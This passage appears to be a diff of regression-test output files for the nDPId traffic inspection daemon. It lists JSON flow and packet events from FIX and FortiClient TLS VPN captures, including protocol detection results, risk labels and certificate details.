00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"fix2.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1614758889588,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1614758889588,"pkt":"5kBKB+riApXG95NLCABFAAAweTwAAIAGAAAKZQACCmYAAoiSBAAt1D8pAAAAAHACgAEU8QAAAgQFtAMDAQA="}
00568{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5,"source":"fix2.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1614758889589,"flow_last_seen":1614758889589,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1614758889589,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.9","src_port":34963,"dst_port":1024,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00457{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"fix2.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1614758889589,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1614758889589,"pkt":"5kBKB+riApXG95NLCABFAAAweT0AAIAGAAAKZQACCmYACYiTBAAt1EIqAAAAAHACgAEU+AAAAgQFtAMDAQA="}
00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"fix2.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1614758889589,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1614758889589,"pkt":"WgXZu6TVApXG95WRCABFAAAweT4AAIAGrLsKZgACCmUAAgQAiJIt1EL8LdQ\/KnASgAGE3gAAAgQFtAMDAQA="}
00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"fix2.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1614758889589,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1614758889589,"pkt":"5kBKB+riApXG95NLCABFAAAoeT4AAIAGAAAKZQACCmYAAoiSBAAt1D8qLdRC\/VAQgAEU6QAAAAAAAAAA"}
00619{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":8,"source":"fix2.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1614758889588,"flow_last_seen":1614758889589,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":85,"flow_tot_l4_payload_len":85,"flow_avg_l4_payload_len":21,"midstream":0,"thread_ts_msec":1614758889589,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":34962,"dst_port":1024,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}}
00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"fix2.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1614758889589,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1614758889589,"pkt":"WgXZu6TVApXG95WRCABFAAAweT8AAIAGrLMKZgAJCmUAAgQAiJMt1EWWLdRCK3ASgAF\/OwAAAgQFtAMDAQA="}
00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"fix2.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1614758889589,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1614758889589,"pkt":"5kBKB+riApXG95NLCABFAAAoeUAAAIAGAAAKZQACCmYACYiTBAAt1EIrLdRFl1AQgAEU8AAAAAAAAAAA"}
00620{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":11,"source":"fix2.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1614758889589,"flow_last_seen":1614758889589,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":85,"flow_tot_l4_payload_len":85,"flow_avg_l4_payload_len":21,"midstream":0,"thread_ts_msec":1614758889589,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.9","src_port":34963,"dst_port":1024,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}}
00667{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3049,"source":"fix2.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":1987,"flow_first_seen":1614758889588,"flow_last_seen":1614758889595,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":120,"flow_tot_l4_payload_len":39543,"flow_avg_l4_payload_len":19,"midstream":0,"thread_ts_msec":1614758889595,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":34962,"dst_port":1024,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}}
00667{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":3049,"source":"fix2.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":1059,"flow_first_seen":1614758889589,"flow_last_seen":1614758889595,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":120,"flow_tot_l4_payload_len":28413,"flow_avg_l4_payload_len":26,"midstream":0,"thread_ts_msec":1614758889595,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.9","src_port":34963,"dst_port":1024,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"FIX","breed":"Safe","category":"RPC"}}
00557{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":3049,"source":"fix2.pcap","alias":"nDPId-test","packets-captured":3049,"packets-processed":3046,"total-skipped-flows":0,"total-l4-data-len":67956,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":2,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":2,"total-idle-flows":2,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":15,"global_ts_msec":1614758889595}
~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~
~~ packets captured/processed: 3049/3046

80
test/results/forticlient.pcap.out
View File

@@ -1,45 +1,45 @@
00462{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"forticlient.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0}
00548{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"forticlient.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1621067203571}
00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621067203571,"flow_last_seen":1621067203571,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1621067203571,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"82.81.46.13","src_port":61805,"dst_port":10443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1621067203571,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1621067203571,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAG9\/\/AqAGyUlEuDfFtKMutlmzOAAAAALAC\/\/9bnAAAAgQFtAEDAwUBAQgKJ6c8YwAAAAAEAgAA"}
00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1621067203633,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1621067203633,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8pJBAADQGX3NSUS4NwKgBsijL8W1kEcpBrZZsz6ASOEBvHAAAAgQFrAQCCAoGP5CkJ6c8YwEDAwo="}
00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1621067203633,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1621067203633,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAG+AvAqAGyUlEuDfFtKMutlmzPZBHKQoAQECzFugAAAQEICienPKAGP5Ck"}
01072{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1621067203571,"flow_last_seen":1621067203776,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":171,"flow_tot_l4_payload_len":171,"flow_avg_l4_payload_len":42,"midstream":0,"thread_ts_msec":1621067203776,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"82.81.46.13","src_port":61805,"dst_port":10443,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"82.81.46.13","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
01129{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1621067203571,"flow_last_seen":1621067203852,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1611,"flow_avg_l4_payload_len":268,"midstream":0,"thread_ts_msec":1621067203852,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"82.81.46.13","src_port":61805,"dst_port":10443,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"82.81.46.13","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"0debd3853f330c574b05e0b6d882dc27","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384"}}
01407{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":7,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1621067203571,"flow_last_seen":1621067203854,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":2620,"flow_avg_l4_payload_len":374,"midstream":0,"thread_ts_msec":1621067203854,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"82.81.46.13","src_port":61805,"dst_port":10443,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.FortiClient","breed":"Safe","category":"VPN"},"tls": {"version":"TLSv1.2","client_requested_server_name":"82.81.46.13","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"0debd3853f330c574b05e0b6d882dc27","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=California, L=Sunnyvale, O=Fortinet, OU=Certificate Authority, CN=support","subjectDN":"C=US, ST=California, L=Sunnyvale, O=Fortinet, OU=FortiGate, CN=FWF60E4Q16012050","fingerprint":"AA:8A:CE:95:99:2A:E0:A4:11:42:E4:C8:40:D7:DB:87:1F:4A:23:45"}}
00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":21,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621067204622,"flow_last_seen":1621067204622,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1621067204622,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"82.81.46.13","src_port":61806,"dst_port":10443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":21,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1621067204622,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1621067204622,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAG9\/\/AqAGyUlEuDfFuKMux1NwAAAAAALAC\/\/\/kHgAAAgQFtAEDAwUBAQgKJ6dAbwAAAAAEAgAA"}
00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":22,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1621067204682,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1621067204682,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8DZFAADQG9nJSUS4NwKgBsijL8W6yVLN5sdTcAaASOEC\/ugAAAgQFrAQCCAoGP5ENJ6dAbwEDAwo="}
00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1621067204682,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1621067204682,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAG+AvAqAGyUlEuDfFuKMux1NwBslSzeoAQECwWWwAAAQEICienQKoGP5EN"}
01093{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":25,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1621067204622,"flow_last_seen":1621067204827,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":203,"flow_tot_l4_payload_len":203,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1621067204827,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"82.81.46.13","src_port":61806,"dst_port":10443,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"3":"DPI (cache)"},"proto":"TLS.FortiClient","breed":"Safe","category":"VPN"},"tls": {"version":"TLSv1.2","client_requested_server_name":"82.81.46.13","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
01150{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":27,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1621067204622,"flow_last_seen":1621067204898,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1643,"flow_avg_l4_payload_len":273,"midstream":0,"thread_ts_msec":1621067204898,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"82.81.46.13","src_port":61806,"dst_port":10443,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"3":"DPI (cache)"},"proto":"TLS.FortiClient","breed":"Safe","category":"VPN"},"tls": {"version":"TLSv1.2","client_requested_server_name":"82.81.46.13","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"0debd3853f330c574b05e0b6d882dc27","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384"}}
01416{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":28,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1621067204622,"flow_last_seen":1621067204900,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":2652,"flow_avg_l4_payload_len":378,"midstream":0,"thread_ts_msec":1621067204900,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"82.81.46.13","src_port":61806,"dst_port":10443,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"3":"DPI (cache)"},"proto":"TLS.FortiClient","breed":"Safe","category":"VPN"},"tls": {"version":"TLSv1.2","client_requested_server_name":"82.81.46.13","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"0debd3853f330c574b05e0b6d882dc27","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=California, L=Sunnyvale, O=Fortinet, OU=Certificate Authority, CN=support","subjectDN":"C=US, ST=California, L=Sunnyvale, O=Fortinet, OU=FortiGate, CN=FWF60E4Q16012050","fingerprint":"AA:8A:CE:95:99:2A:E0:A4:11:42:E4:C8:40:D7:DB:87:1F:4A:23:45"}}
00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":46,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621067205651,"flow_last_seen":1621067205651,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1621067205651,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"82.81.46.13","src_port":61811,"dst_port":10443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":46,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1621067205651,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1621067205651,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAG9\/\/AqAGyUlEuDfFzKMsSeiBCAAAAALAC\/\/87PQAAAgQFtAEDAwUBAQgKJ6dEZQAAAAAEAgAA"}
00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":48,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1621067205710,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1621067205710,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8c5FAADQGkHJSUS4NwKgBsijL8XP7CfxqEnogQ6ASOECEzAAAAgQFrAQCCAoGP5FzJ6dEZQEDAwo="}
00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":49,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1621067205710,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1621067205710,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAG+AvAqAGyUlEuDfFzKMsSeiBD+wn8a4AQECzbbQAAAQEICienRJ8GP5Fz"}
01093{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":50,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1621067205651,"flow_last_seen":1621067205856,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":203,"flow_tot_l4_payload_len":203,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1621067205856,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"82.81.46.13","src_port":61811,"dst_port":10443,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"3":"DPI (cache)"},"proto":"TLS.FortiClient","breed":"Safe","category":"VPN"},"tls": {"version":"TLSv1.2","client_requested_server_name":"82.81.46.13","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
01150{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":52,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1621067205651,"flow_last_seen":1621067205926,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1643,"flow_avg_l4_payload_len":273,"midstream":0,"thread_ts_msec":1621067205926,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"82.81.46.13","src_port":61811,"dst_port":10443,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"3":"DPI (cache)"},"proto":"TLS.FortiClient","breed":"Safe","category":"VPN"},"tls": {"version":"TLSv1.2","client_requested_server_name":"82.81.46.13","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"0debd3853f330c574b05e0b6d882dc27","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384"}}
01416{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":53,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1621067205651,"flow_last_seen":1621067205928,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":2652,"flow_avg_l4_payload_len":378,"midstream":0,"thread_ts_msec":1621067205928,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"82.81.46.13","src_port":61811,"dst_port":10443,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"3":"DPI (cache)"},"proto":"TLS.FortiClient","breed":"Safe","category":"VPN"},"tls": {"version":"TLSv1.2","client_requested_server_name":"82.81.46.13","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"0debd3853f330c574b05e0b6d882dc27","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=California, L=Sunnyvale, O=Fortinet, OU=Certificate Authority, CN=support","subjectDN":"C=US, ST=California, L=Sunnyvale, O=Fortinet, OU=FortiGate, CN=FWF60E4Q16012050","fingerprint":"AA:8A:CE:95:99:2A:E0:A4:11:42:E4:C8:40:D7:DB:87:1F:4A:23:45"}}
00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":71,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621067206773,"flow_last_seen":1621067206773,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1621067206773,"l3_proto":"ip4","src_ip":"192.168.1.178","dst_ip":"82.81.46.13","src_port":61812,"dst_port":10443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":71,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1621067206773,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1621067206773,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAG9\/\/AqAGyUlEuDfF0KMspKYnJAAAAALAC\/\/+2swAAAgQFtAEDAwUBAQgKJ6dItwAAAAAEAgAA"}
00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":72,"source":"forticlient.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1621067206833,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1621067206833,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA85JFAADQGH3JSUS4NwKgBsijL8XTNezJoKSmJyqASOED3YgAAAgQFrAQCCAoGP5HkJ6dItwEDAwo="}
